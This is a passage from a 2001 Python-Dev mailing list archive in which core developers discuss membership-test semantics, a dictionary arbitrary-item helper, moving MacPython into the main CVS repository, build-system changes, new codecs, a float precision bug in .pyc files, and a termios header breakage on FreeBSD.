> > I don't believe I ever knew that! Thanks. I erroneously assumed that the looping behavior was *introduced* when __contains__ was added. Surely you knew that "x in y" looped over the items of y? What else could it have done? It was only defined on sequences! > > ... > > No, that was probably just an oversight -- clearly it should have used > > rich comparisons. (I guess this is a disadvantage of the approach I'm > > recommending here: if the default behavior changes, the > > reimplementation of the default behavior in the class must be changed > > too.) > > I factored out the new iterator-based __contains__ logic into a new private > API function, called when appropriate by both PySequence_Contains() and > instance_contains(). So any future changes to what iterator-based > __contains__ means will only need to be made in one place. Cool. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:53:51 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:53:51 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > ... > Surely you knew that "x in y" looped over the items of y? What else > could it have done? It was only defined on sequences! What's a sequence? I expect I assumed that enduring a Python method call for every element of an *instance* was so expensive that Python didn't bother implementing "in" for instances (just for builtin sequences like lists and strings etc). I *know* I assumed it was so expensive that I never tried it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting "if x in s" where s was a tuple, list or string of length no more than 4; for anything bigger I always used a dict or bisect). So it's a personal blind spot likely due to never looking in that direction. From paul at pfdubois.com Sun May 6 03:10:37 2001 From: paul at pfdubois.com (Paul F.
Dubois) Date: Sat, 5 May 2001 18:10:37 -0700 Subject: [Python-Dev] multiple inheritance -- what I meant Message-ID: When I suggested a modification to the inheritance clause, class X (Y rename a as b, c as d, Z rename foo as bar): someone suggested this was the same as class X (Y, Z): b = Y.a d = Y.c bar = Z.foo I meant two things by my suggestion: 1. I meant that Y.a would never be found when searching for X.a. In particular, if Z.a exists, and a is not explicitly defined in X, X.a is Z.a. 2. More philosophically, rather than being a consequence of the language like the second method is, the proposed syntax is intended to be a clear message to someone reading the class about how the inherited names are being handled. Compare the effort required of a reader to understand these two. (If you think the second one is easier, you probably attended Spam III.) If you can rename in this way there are no problems with multiple inheritance. To be complete you should probably also allow Y undefine x, ... which simply makes Y.x unavailable from X. From Greg.Wilson at baltimore.com Sun May 6 18:26:00 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Sun, 6 May 2001 12:26:00 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Has anyone else found themselves wanting a method that chooses and returns a dictionary element at random, without removing it (as popitem does)? Or is there some way to tell popitem to return a value without mutating the container? If neither, would this be useful, or is it DHG? Thanks Greg From tim.one at home.com Sun May 6 20:15:57 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 6 May 2001 14:15:57 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: [Greg Wilson] > Has anyone else found themselves wanting a method that > chooses and returns a dictionary element at random, Do you mean "random" or "arbitrary"? "random" means every dict entry is equally likely to be chosen; "arbitrary" means nothing is defined about the result (except that it *is* a dict entry). random is much more expensive to implement (under the covers it's a vector, but a vector with holes, so you can't just pick a *slot* at random then "slide over" to the first non-hole (else a given entry's chance of being selected would be proportional to the # of contiguous holes adjacent to it)). > without removing it (as popitem does)? Note that, in the sense above, popitem() returns an arbitrary element. > Or is there some way to tell popitem to return a value without > mutating the container? No. Easy to write an efficient function that does, though: def arb(dict): k, v = pair = dict.popitem() dict[k] = v # restore the entry return pair Given the new dict iterators in 2.2, there's an easier fast way that doesn't mutate the dict even under the covers: def arb(dict): if dict: return dict.iteritems().next() raise KeyError("arb passed an empty dict") > If neither, would this be useful, or is it DHG? Do you have a particular algorithm, or class of algorithms, in mind for which it is useful? 
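Here is a Python 3 sketch of Tim's two `arb()` variants. `iteritems()` and `.next()` no longer exist, so `d.items()` and the built-in `next()` stand in for them. `random_item` is an added illustration of a "random" rather than "arbitrary" choice. It costs O(n) because it copies the items into a list first.

```python
import random


def arb(d):
    """Return an arbitrary (key, value) pair from d without mutating it."""
    if not d:
        raise KeyError("arb passed an empty dict")
    # next(iter(...)) takes the first pair the iterator yields and stops.
    return next(iter(d.items()))


def arb_via_popitem(d):
    """Tim's first variant: pop a pair, then put it back."""
    k, v = pair = d.popitem()
    d[k] = v  # restore the entry
    return pair


def random_item(d):
    """Uniformly random pair, but O(len(d)): materializes the items first."""
    return random.choice(list(d.items()))


inventory = {"apples": 3, "pears": 5}
print(arb(inventory))
print(arb_via_popitem(inventory))
print(inventory)  # unchanged: {'apples': 3, 'pears': 5}
```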
popitem's current behavior is most useful for me in the set algorithms I've used, usually in the form: while working_set: x, dontcare = working_set.popitem() process(x) # which may add more elts to working_set From jack at oratrix.nl Mon May 7 11:39:43 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:39:43 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Folks, now that there's finally a decent (well, somewhat decent:-) Mac CVS client that supports ssh I'd like to move MacPython to sourceforge. There's two ways I can go about this: start a new MacPython project or merge the MacPython stuff into the main Python CVS repository. The Mac specific stuff for Python is all concentrated in a single subtree Mac of the main Python tree (the subtree has its own hierarchy of Python/Modules/Lib/etc directories), so putting it in the main repository should not pollute the filenamespace all that much. It would also have the advantage that a single "cvs update" would update everything (whereas the current situation for Mac developers, where Python/Mac is from a different CVSROOT than Python, does not have that advantage). The downside is that everyone who does a full checkout of the tree would get an extra 1000 or so files on their disk that are pretty useless unless they have a mac. Oh yes, another plus for putting stuff in the main repository is MacOSX support. Some MacPython modules have been "ported" to MacOSX, and I've started on adding them to setup.py, and life would become a lot simpler for people compiling on MacOSX if they had everything available automatically. 
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:45:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:45:59 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup of Python does not allow for an easy addition of a platform-dependent sourcefile to the core interpreter (or am I missing something?). This is a bit of functionality I need to port the various Mac modules to MacOSX-python. The platform-dependent sourcefile has various glue routines for turning MacOS error codes into exceptions and that sort of stuff. Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:49:17 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:49:17 +0200 Subject: [Python-Dev] Need a search path for modules in setup.py Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl> (Don't worry, this is the last in my flurry of OSX related messages:-) Life would be a lot simpler for me if setup.py (the one for the main extension modules) would have a search path for module sourcefiles. As Mac modules currently live in Python/Mac/Modules (as opposed to Python/Modules) not having a search path means I get ugly "../Mac/Modules/foomodule.c" constructs. I have the code for setup.py ready, is it OK if I check it in?
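The thread does not show Jack's actual setup.py change. As a hedged sketch of one way a source-file search path could work, `find_source` and `MODULE_SEARCH_PATH` below are hypothetical names. The function returns the first directory on the path that contains the requested file.

```python
import os


def find_source(filename, search_path):
    """Return the path of filename in the first directory of search_path that has it.

    Raises FileNotFoundError if no directory on the path contains the file.
    """
    for directory in search_path:
        candidate = os.path.join(directory, filename)
        if os.path.isfile(candidate):
            return candidate
    raise FileNotFoundError(
        f"{filename!r} not found in any of: {', '.join(search_path)}"
    )


# Hypothetical usage inside a setup.py: look in Modules/ first, then Mac/Modules/,
# so an extension can name "foomodule.c" instead of "../Mac/Modules/foomodule.c".
MODULE_SEARCH_PATH = ["Modules", os.path.join("Mac", "Modules")]
```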
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From loewis at informatik.hu-berlin.de Mon May 7 11:53:54 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 7 May 2001 11:53:54 +0200 (MEST) Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> > There's two ways I can go about this: start a new MacPython project > or merge the MacPython stuff into the main Python CVS repository. There is actually a third option: Use the Python SF project, but create a new module in the Python CVS repository (so no merging would be done). I don't know how much code this is. I'd favour merging the Mac code into the core distribution. If there are loads of Mac-specific modules that not every MacPython user needs, it might be advisable to create a distutils package that contains the extra modules. Such a package should still live in cvs.python.sourceforge.net:/cvsroot/python. Just my 0.02EUR, Martin From guido at digicool.com Mon May 7 16:00:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 07 May 2001 09:00:08 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200." <200105070953.LAA14803@pandora.informatik.hu-berlin.de> References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com> [Jack] > > There's two ways I can go about this: start a new MacPython project > > or merge the MacPython stuff into the main Python CVS repository. We have platform-specific subdirectories for so many projects that it's a shame we don't have the Mac code in there as well! 
The only (small) advantage I can imagine of a separate MacPython project would be that you (Jack) can more easily give others commit permission to the Mac tree without giving them commit permission to all of Python (which requires they gain the trust of a larger group of Python developers). Of course, I don't know if you expect much help from others who are not already Python developers. [Martin] > There is actually a third option: Use the Python SF project, but > create a new module in the Python CVS repository (so no merging would > be done). I don't know much about modules, but would this allow Jack to check out the main code and the MacPython code into a single work directory (which he needs)? If so, it may be the best solution. Note that no matter how you do it, you'll have to submit a tree of RCS files to the SF sysadmins to load, unless you want to lose years of MacPython cvs logs... > I don't know how much code this is. I'd favour merging the Mac code > into the core distribution. If there are loads of Mac-specific modules > that not every MacPython user needs, it might be advisable to create a > distutils package that contains the extra modules. Such a package > should still live in cvs.python.sourceforge.net:/cvsroot/python. Undecidedly yours, (Jack, regarding your Makefile and setup.py changes: I'd wait for opinions on your patches from Neil and Andrew. I don't see why they would have an objection to adding these features, but the specific implementation you propose might be subject to comments.) --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Mon May 7 15:04:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 7 May 2001 08:04:15 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl> References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <15094.40271.461338.638822@beluga.mojam.com> Jack> ... 
I'd like to move MacPython to sourceforge. There's two ways I Jack> can go about this: start a new MacPython project or merge the Jack> MacPython stuff into the main Python CVS repository. I say merge. Skip From nas at python.ca Mon May 7 15:14:52 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:14:52 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200 References: <20010507094600.217CE312BA0@snelboot.oratrix.nl> Message-ID: <20010507061452.A23494@glacier.fnational.com> Jack Jansen wrote: > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > of Python does not allow for an easy addition of a platform-dependent > sourcefile to the core interpreter (or am I missing something?). No, it's still a big ugly hack. :-) > This is a bit of functionality I need to port the various Mac > modules to MacOSX-python. The platform-dependent sourcefile has > various glue routines for turning MacOS error codes into > exceptions and that sort of stuff. > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? How would this work? Would MACHDEP_OBJS be set by an autoconf substitution? Neil From jack at oratrix.nl Mon May 7 15:17:18 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:17:18 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Guido van Rossum , Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> > We have platform-specific subdirectories for so many projects that > it's a shame we don't have the Mac code in there as well! Great! I'll pack up my repository and send it to the sourceforge-powers-that-be shortly.
The write permission for other MacPython developers shouldn't be a problem, I think Just is currently the only person with write permission (but I have to check). > (Jack, regarding your Makefile and setup.py changes: I'd wait for > opinions on your patches from Neil and Andrew. I don't see why > they would have an objection to adding these features, but the > specific implementation you propose might be subject to comments.) Definitely. I'll put them up as patches and then see what happens. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From jack at oratrix.nl Mon May 7 15:27:14 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:27:14 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: Message by Neil Schemenauer , Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl> > Jack Jansen wrote: > > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > > of Python does not allow for an easy addition of a platform-dependent > > sourcefile to the core interpreter (or am I missing something?). > [...] > > > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? > > How would this work? Would MACHDEP_OBJS be set by an autoconf > subsitution? Yes, that's what I had in mind (haven't written the code yet). Similar to the way DYNLOADFILE is set, but empty for all platforms except for OSX. 
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From nas at python.ca Mon May 7 15:30:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:30:42 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200 References: <20010507132714.B0808312BA1@snelboot.oratrix.nl> Message-ID: <20010507063042.D23494@glacier.fnational.com> Jack Jansen wrote: > Yes, that's what I had in mind (haven't written the code yet). Similar to the > way DYNLOADFILE is set, but empty for all platforms except for OSX. Sounds good to me. Try to keep the code somewhat general so that other platforms may use it. Neil From mal at lemburg.com Mon May 7 20:44:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 07 May 2001 20:44:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com> Message-ID: <3AF6ED27.FB2C077B@lemburg.com> Guido van Rossum wrote: > > > I've attached the patch. Due to a small reorganisation the > > patch is a little longer -- symmetry has its price at C level > > too ;-) > > Looks good on paper, so go ahead and check it in. Watch out for > potential changes caused by Tim's iter-crusade! :-) OK. I'll look into this later this week. > While you're at it, why don't you check in the rot13 codec you posted > -- it's good to have simple examples in the standard library.
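For comparison, here is a sketch assuming current Python 3. Its standard `codecs` module includes rot13 as well as base64 and hex codecs. This illustrates the general idea, not the codec Marc-Andre posted. rot13 maps `str` to `str`, while base64 and hex map `bytes` to `bytes`. Both directions go through `codecs.encode()` and `codecs.decode()`.

```python
import codecs

# rot13 is a str-to-str codec, so it is reached through codecs.encode().
print(codecs.encode("Hello, Python", "rot13"))  # Uryyb, Clguba

# base64 and hex are bytes-to-bytes codecs.
data = b"hi"
print(codecs.encode(data, "base64"))  # b'aGk=\n'
print(codecs.encode(data, "hex"))     # b'6869'

# Each codec round-trips through codecs.decode().
assert codecs.decode(codecs.encode(data, "base64"), "base64") == data
assert codecs.decode(codecs.encode(data, "hex"), "hex") == data
```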
> It would also be cool to have codecs for common file encodings like > base64, quoted-printable, binhex, uuencode, and even hex > (binascii.hexlify). Right. I'll add these in the next few weeks -- as time comes along. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From martin at loewis.home.cs.tu-berlin.de Mon May 7 23:21:27 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 7 May 2001 23:21:27 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de> > I don't know much about modules, but would this allow Jack to check > out the main code and the MacPython code into a single work > directory (which he needs)? Using CVS modules allows to merge parts of the tree into a single sandbox. E.g. you could do macpython python/dist/src &Mac 'cvs co macpython' then would give you a dist/src directory, which also contains a Mac directory (where Mac is another module, alongside with /python, or a CVSROOT/modules entry). You could use an exclude list, e.g. macpython !PC !PCbuild !RISCOS python/dist/src &Mac What you *cannot* do is to merge modules on a per-directory basis; all files in a single directory must come from the same CVS module - you can think of ampersand modules similar to Unix mount(1)ed file systems. Regards, Martin From tim.one at home.com Tue May 8 06:14:22 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:14:22 -0400 Subject: [Python-Dev] Help with SF bug 105470 Message-ID: An ancient bug just got (re?)discovered on c.l.py, which I entered into SF: http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470& atid=105470 This has to do w/ gross loss of precision in manifest Python float constants, if and only if a module is loaded from .pyc or .pyo format. 
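The thread does not spell out where the precision was lost, so this sketch, assuming Python 3, shows only the general mechanism. A double written with too few significant digits cannot be read back exactly (Python 2's `str()` used 12). Seventeen significant digits are always enough.

```python
import marshal

x = 0.1 + 0.2  # 0.30000000000000004, not exactly 0.3

# Twelve significant digits are not enough to identify a double uniquely...
short = "%.12g" % x
print(short, float(short) == x)  # 0.3 False

# ...but seventeen always are, so the value survives a text round trip.
full = "%.17g" % x
print(full, float(full) == x)    # 0.30000000000000004 True

# repr() picks the shortest string that round-trips, and marshal (the
# serialization format behind .pyc files) preserves the value exactly today.
assert float(repr(x)) == x
assert marshal.loads(marshal.dumps(x)) == x
```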
Since it's fp-related, and fp is tricky x-platform, I'd like some volunteers to test this before I check it in. Current CVS Python contains a dormant test case. There's a patch attached to the bug report that activates the test case, and tries to repair the problem. After the patch, the fix works if and only if test_import doesn't fail, neither after deleting all .pyc/.pyo files first, nor if run a second time w/o deleting .pyc/.pyo. Works on Win98SE, but you may have already guessed that. From tim.one at home.com Tue May 8 06:52:37 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:52:37 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Message-ID: [Jeremy Hylton, on python-checkins] > ... > XXX When should nested scopes be made non-optional on the trunk? Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you have trouble sleeping tonight. From thomas at xs4all.net Tue May 8 12:14:20 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 12:14:20 +0200 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400 References: <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org> Message-ID: <20010508121420.Y16486@xs4all.nl> On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote: > >>>>> "JE" == Jeff Epler writes: > | Why not let us spell this as: > | class X(Y): > | from Y import foo as _sfoo, bar as _sbar > | ... > NS> This already has a meaning in Python. Paul's suggested syntax > NS> is pretty neat, IMHO. > Not if Y is a class though, right? That would currently raise an > ImportError, ... Nope: >>> class string: ... pass ...
>>> from string import split >>> string >>> That could be considered a misfeature for more than one reason (like importing from non-module objects, which you now do by inserting the object into sys.modules) but can't be fixed without breaking backward compatibility, except by inventing new syntax. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From Mark.Favas at per.dem.csiro.au Tue May 8 12:34:37 2001 From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat)) Date: Tue, 8 May 2001 18:34:37 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> A change to termios.c in the last couple of days to #include termio.h as well as termios.h breaks the build on FreeBSD, which has only termios.h - needs an autoconf test? There'll probably be other similar systems. Cheers, Mark From thomas at xs4all.net Tue May 8 13:36:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 13:36:38 +0200 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: ; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: <20010508133638.Z16486@xs4all.nl> On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote: > Given the new dict iterators in 2.2, there's an easier fast way that doesn't > mutate the dict even under the covers: > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") You probably want: arb = dict.iteritems().next so that you don't keep on returning the same key,value pair. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
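In Python 3, Thomas's suggestion is spelled `iter(d.items()).__next__`, because `iteritems()` and `.next()` were Python 2 names. A minimal sketch:

```python
d = {"a": 1, "b": 2, "c": 3}

# Bind the iterator's __next__ once; each call then yields the next pair.
arb = iter(d.items()).__next__

print(arb())  # ('a', 1)  (dicts keep insertion order in Python 3.7+)
print(arb())  # ('b', 2)
```

Each call advances the same iterator. Once every pair has been returned, the next call raises StopIteration. If the dict changes size between calls, the next call raises RuntimeError.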
From thomas at xs4all.net Tue May 8 14:10:00 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:10:00 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200 References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <20010508141000.A16486@xs4all.nl> On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote: > The Mac specific stuff for Python is all concentrated in a single subtree Mac > of the main Python tree (the subtree has its own hierarchy of > Python/Modules/Lib/etc directories), so putting it in the main repository > should not pollute the filenamespace all that much. It would also have the > advantage that a single "cvs update" would update everything (whereas the > current situation for Mac developers, where Python/Mac is from a different > CVSROOT than Python, does not have that advantage). The downside is that > everyone who does a full checkout of the tree would get an extra 1000 or so > files on their disk that are pretty useless unless they have a mac. I'd say merge, except that the number '1000' is very large. Is it really 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 .py files spread out over the tree (567 of which in Lib, the rest in Demo/Tools) and obviously some misc files and CVS stuff, for a total of around 2500 files. Is that 1000 a real number ? No temp files, auto-generated files, .o files etc ? How large are they ? (the average size in the current CVS tree is about 10k) I'd probably still say 'merge', I'm just curious where the large number of files comes from. Is it to keep the changes to the original files minimal ? Given the number of platform-dependent #ifdefs and differently-defined macros we're using now, I don't see why some of those changes couldn't be moved into the original files, if that's the case. -- Thomas Wouters Hi!
I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Tue May 8 14:13:39 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:13:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200 References: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> Message-ID: <20010508141339.B16486@xs4all.nl> On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote: > > We have platform-specific subdirectories for so many projects that > > it's a shame we don't have the Mac code in there as well! > Great! I'll pack up my repository and send it to the > sourceforge-powers-that-be shortly. The write permission for other MacPython > developers shouldn't be a problem, I think Just is currently the only person > with write permission (but I have to check). That doesn't mean there isn't a problem. Just doesn't have write access :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Tue May 8 15:35:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:35:50 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400." References: Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com> > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes be made non-optional on the trunk? [Tim] > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you > have trouble sleeping tonight. +1.
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 8 15:41:42 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:41:42 -0500 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800." <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com> > A change to termios.c in the last couple of days to #include termio.h as > well as termios.h breaks the build on FreeBSD, which has only termios.h - > needs an autoconf test? There'll probably be other similar systems. Frankly, I don't see the point of including termio.h at all -- it seems to be a backwards compatibility file. Mark, can you please enter this in the bug database and assign it to whoever checked in the change? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Tue May 8 16:05:01 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 8 May 2001 07:05:01 -0700 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: ; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400 References: Message-ID: <20010508070501.A25794@glacier.fnational.com> Tim Peters wrote: > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes be made non-optional on the trunk? > > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you > have trouble sleeping tonight. Shouldn't the entry in the __future__ file be: nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) or am I misunderstanding something?
Neil From jack at oratrix.nl Tue May 8 16:07:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 08 May 2001 16:07:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Thomas Wouters , Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl> > I'd say merge, except that the number '1000' is very large. Is it really > 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 > .py files spread out over the tree (567 of which in Lib, the rest in > Demo/Tools) and obviously some misc files and CVS stuff, for a total of > around 2500 files. Is that 1000 a real number ? No temp files, > auto-generated files, .o files etc ? How large are they ? (the average size > in the current CVS tree is about 10k) It's actually 830 files. This is 320 .py files (130 in Lib, the rest in Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build system), 30 resource files and then assorted things (html documentation, scripts to drive the distribution builder, etc). The .xml and .exp files and about 20 of the .c files are machine generated, so they could technically be left out of the repository. The generation process of these files is a bit painful, though, so I've added them as a convenience (the reasoning is a bit along the lines of the Grammar stuff of the core). The one thing that I should do is clean out the "Unsupported" directory before doing the merge. It contains some stuff that is long dead. But then, it isn't all that many files. 
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From mwh at python.net Tue May 8 16:41:45 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 8 May 2001 15:41:45 +0100 (BST) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: Guido van Rossum writes: > > A change to termios.c in the last couple of days to #include termio.h > > as well as termios.h breaks the build on FreeBSD, which has only > > termios.h - needs an autoconf test? There'll probably be other similar > > systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. If you don't include termio.h the build breaks on alpha/OSF1. This sounds to me like OSF1's headers are broken (you can't include sys/ioctl.h without including termio.h first, it seems, or you get complaints about struct termio being undefined). So I'd suggest +#ifdef __osf__ #include <termio.h> +#endif and then see if the build breaks anywhere else (I love unix). Using the sf compile farm, I've tested this on FreeBSD, Linux/x86, Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives a pile of warnings from redefined macros and then dies 'cause it can't find a valid license file). So we might need some more magic for solaris using cc. Cheers, M. -- Imagine if every Thursday your shoes exploded if you tied them the usual way. This happens to us all the time with computers, and nobody thinks of complaining. -- Jeff Raskin From fdrake at acm.org Tue May 8 16:45:18 